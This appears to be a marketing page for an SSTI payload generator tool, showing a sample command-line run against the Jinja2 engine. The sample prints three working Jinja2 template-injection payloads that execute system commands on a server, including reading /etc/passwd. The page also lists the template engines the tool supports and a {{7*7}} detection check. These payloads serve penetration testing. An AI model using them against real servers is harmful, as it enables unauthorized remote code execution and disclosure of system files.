SSTI Forge

Template Injection Generator

Server-Side Template Injection is a critical vulnerability often leading to RCE. SSTI Forge generates engine-specific payloads to detect and exploit template engines across Python, Java, PHP, and Ruby stacks.

Try SSTI Forge Documentation

Engines:Jinja2, Twig, Freemarker, Velocity, Mako

SSTI Generator

> rasec ssti --engine jinja2 --action rce

[+] Targeted Engine: Jinja2 (Python)

[+] Payload Type: Remote Code Execution

[1] {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

[2] {{ config.__class__.__init__.__globals__['os'].popen('ls -la').read() }}

[3] {{ "".__class__.__mro__[1].__subclasses__()[407]("cat /etc/passwd",shell=True,stdout=-1).communicate()[0].strip() }}

[+] Use with caution!

Key Features

Multi-Engine Support

Supports Jinja2, Twig, Freemarker, Velocity, and generic detection.

RCE Payloads

Generates payloads to execute system commands or read active configuration.

Safe Detection

Includes non-destructive calculation payloads (e.g., {{7*7}}) for verification.

Ready to try SSTI Forge?

Start using this tool in seconds. No credit card required.

Launch SSTI Forge

All Tools Try Live Demo